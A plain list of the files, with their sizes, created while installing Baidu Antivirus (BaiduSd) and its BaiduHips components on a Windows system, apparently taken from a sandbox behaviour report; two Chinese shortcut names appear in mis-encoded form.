%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\百度æÂ€毒.lnk (907 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%System%\config\SYSTEM.LOG (5938 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\å¸载百度æÂ€毒.lnk (880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
%System%\drivers\BDDefense.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%WinDir%\Temp\Tar1B.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%WinDir%\Temp\Cab1A.tmp (56 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
%WinDir%\Temp\Tar15.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%WinDir%\Temp\Cab14.tmp (56 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
